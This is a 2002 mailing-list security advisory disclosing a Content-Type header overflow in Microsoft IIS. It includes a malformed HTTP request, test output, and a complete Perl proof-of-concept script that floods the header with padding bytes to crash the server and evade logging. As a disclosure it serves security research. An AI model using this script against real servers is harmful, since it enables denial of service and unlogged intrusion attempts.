Vulnerability Development mailing list archives
IIS Vulnerability Content-Type overflow
From: "at4r" <at4r () hotmail com>
Date: Mon, 2 Dec 2002 23:31:27 +0100
------------------------ 3wdesign.es security ------------------------ Advisory: IIS Vulnerability Content-Type overflow discovered: November 26, 2002 Platforms: windows NT/2000/xp ( iis 4.0 iis 5.0 iis 5.1 ... ¿ 6.0 ? ) Vendors: Microsoft Corporation (http://www.microsoft.com) Andrés Tarascó ( at4r at 3wdesign.es ) discovered this vulnerability ------------------------ 3wdesign.es security ------------------------ while testing a few days ago how to reproduce the lastest mdac rds vulnerability i found that a specially malformed http request to an IIS Webserver can allow a buffer overflow. The bug is in the Content-Type string and seems that is not the same vulnerability founded in mdac RDS few days ago by foundstone because IIS webservers with all security patches are vulnerable to this. GET /foo HTTP/1.0 Host: hax Content-Type: application/x-www-form-urlencoded Content-Length: 56 Accept-Language: en Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...about 32700....] When lenght of both content-type strings is ~> 32768 there is an overflow, and requests are not being logged by IIS. here is an example of this bug: aT4r@server:~$ ./test.pl 192.168.0.69 80 32684 HTTP/1.1 500 Server Error Server: Microsoft-IIS/5.0 Date: Tue, 26 Nov 2002 22:21:56 GMT Content-Type: text/html Content-Length: 119 <html><head><title>Error</title></head><body>Not enough storage is available to complete this operation. </body></html> aT4r@server:~$ aT4r@server:~$ ./test.pl 192.168.0.69 80 150000 HTTP/1.1 500 Server Error Server: Microsoft-IIS/5.0 Date: Tue, 26 Nov 2002 22:22:30 GMT Content-Type: text/html Content-Length: 98 <html><head><title>Bad Request</title></head><body><h1>HTTP/1.1 400 Bad Request</h1></body></html> aT4r@server:~$ aT4r@server:~$ ./test.pl 192.168.0.69 80 300000 aT4r@server:~$ i have an easy perl script to test this: [test.pl]-------------------------- #!/usr/bin/perl -W # Its possible to send requests to an IIS webserver without being logged. # This allow an attacker to launch a DoS attack against the server with # multiple requests having a big CPU Consume. # tested under IIS 4.0, IIS 5.0 and 5.1 # Email: at4r AT 3wdesign.es # Discovered: 26 november 2002 # Greetings to my friends: Tarako, Drakar, |tyr| , [back] , croulder, ppp0 , Contraste. require IO::Socket; if ($#ARGV<1) { print "\n use: ./test.pl IP Port N!! \n\n"; exit; } printf"\n ----------------------------------------------------\n"; print "| IIS Testing |\n"; printf" ----------------------------------------------------\n\n"; $cabecera = "GET /foo HTTP/1.0\n". "Host: hax\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: 56\n". "Accept-Language: en\n"; $sock = new IO::Socket::INET (PeerAddr => "$ARGV[0]", PeerPort => "$ARGV[1]", Proto => "tcp"); die "\nCould not connect to $ARGV[0] : $!\n" unless $sock; print $sock "${cabecera}"; $bof = `perl -e "print '\x90' x $ARGV[2]"`; print $sock "Content-Type: ${bof}\n\r\n\r\n"; while (<$sock>) { print "${_}"; } printf "\n"; --------------------------[test.pl] I dont Know if all webservers are vulnerable to this and if its possible to execute code, so please take a look. vendor was contacted but i got no answer. if you got more information please send me an email to: at4r at 3wdesign.es.
Current thread:
- IIS Vulnerability Content-Type overflow at4r (Dec 03)
- Re: IIS Vulnerability Content-Type overflow Syzop (Dec 03)
- Re: IIS Vulnerability Content-Type overflow Dan Hanson (Dec 03)